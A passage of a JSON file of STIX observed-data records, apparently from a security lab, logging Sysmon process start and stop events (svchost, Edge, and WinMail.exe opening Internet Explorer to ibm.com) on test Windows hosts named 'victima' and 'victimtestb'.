| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "WinMail.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\WinMail" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:56:58.561Z", | |
| "last_observed": "2022-07-27T14:56:58.561Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "name": "elastic_ecs", | |
| "type": "identity" | |
| }, | |
| { | |
| "id": "observed-data--1cb92da5-20ed-4685-9a18-61c16a400446", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.482Z", | |
| "modified": "2022-07-28T16:05:08.482Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-8558-62e0-a304-000000001200}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 676 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wlidsvc", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T02:27:02.854396804Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T02:26:55.036Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victimtestb", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victimtestb", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-8558-62e0-a304-000000001200}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T00:22:48.648Z", | |
| "last_observed": "2022-07-27T00:22:48.648Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--06b0e548-0833-4315-ba53-261c1d644c52", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.483Z", | |
| "modified": "2022-07-28T16:05:08.483Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "svchost.exe", | |
| "pid": 6492, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T02:27:02.865487722Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T02:26:55.039Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-8558-62e0-a304-000000001200}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victimtestb", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victimtestb", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T00:29:40.291Z", | |
| "last_observed": "2022-07-27T00:29:40.291Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b1f6d265-c2b6-47bf-bf0d-23edafaf7e00", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.483Z", | |
| "modified": "2022-07-28T16:05:08.483Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "svchost.exe", | |
| "pid": 7220, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:17:18.005264713Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:17:11.681Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-48a9-62e1-9801-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:17:10.098Z", | |
| "last_observed": "2022-07-27T14:17:10.098Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--bd4aaeae-b10c-40cd-8c9b-651cd2cd7c96", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.483Z", | |
| "modified": "2022-07-28T16:05:08.483Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=data_decoder.mojom.DataDecoderService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=service", | |
| "--mojo-platform-channel-handle=3772", | |
| "--field-trial-handle=2092,i,11005644001171300450,12417626312259248729,131072", | |
| "/prefetch:8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--no-startup-window", | |
| "/prefetch:5" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4952-62e1-aa01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4954-62e1-b301-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8476, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 7220, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3772 --field-trial-handle=2092,i,11005644001171300450,12417626312259248729,131072 /prefetch:8", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:19:08.356912066Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:19:02.013Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=data_decoder.mojom.DataDecoderService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=service", | |
| "--mojo-platform-channel-handle=3772", | |
| "--field-trial-handle=2092,i,11005644001171300450,12417626312259248729,131072", | |
| "/prefetch:8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--no-startup-window", | |
| "/prefetch:5" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4952-62e1-aa01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4954-62e1-b301-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:19:00.347Z", | |
| "last_observed": "2022-07-27T14:19:00.347Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--25aced42-333a-4bf2-bbd3-58558417182a", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.484Z", | |
| "modified": "2022-07-28T16:05:08.484Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 7220, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:19:08.357877747Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:19:02.013Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4954-62e1-b301-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:19:00.471Z", | |
| "last_observed": "2022-07-27T14:19:00.471Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ec149233-e4b3-49e7-8e7c-8578eaa90f86", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.484Z", | |
| "modified": "2022-07-28T16:05:08.484Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 2, | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "WinMail.exe", | |
| "pid": 2840, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\WinMail\\WinMail.exe\" " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:18.681155378Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:12.345Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "WinMail.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\WinMail" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\WinMail\\WinMail.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-49ba-62e1-c201-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 2, | |
| "entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:06.753Z", | |
| "last_observed": "2022-07-27T14:26:06.753Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--a810d391-b383-468a-a126-fe8ee6fa3948", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.484Z", | |
| "modified": "2022-07-28T16:05:08.484Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 4, | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:18.682628882Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:12.345Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "11.00.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Internet Explorer", | |
| "pe_description": "Internet Explorer", | |
| "pe_original_file_name": "IEXPLORE.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 4, | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:11.427Z", | |
| "last_observed": "2022-07-27T14:26:11.427Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b21582b9-0380-49af-81ad-8e9f2e70192a", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--8bf2bb3e-307b-459c-b2d0-bdae967e447e", | |
| "created": "2022-07-28T16:05:08.485Z", | |
| "modified": "2022-07-28T16:05:08.485Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5260, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:23.347113260Z", | |
| "code": "1", | |
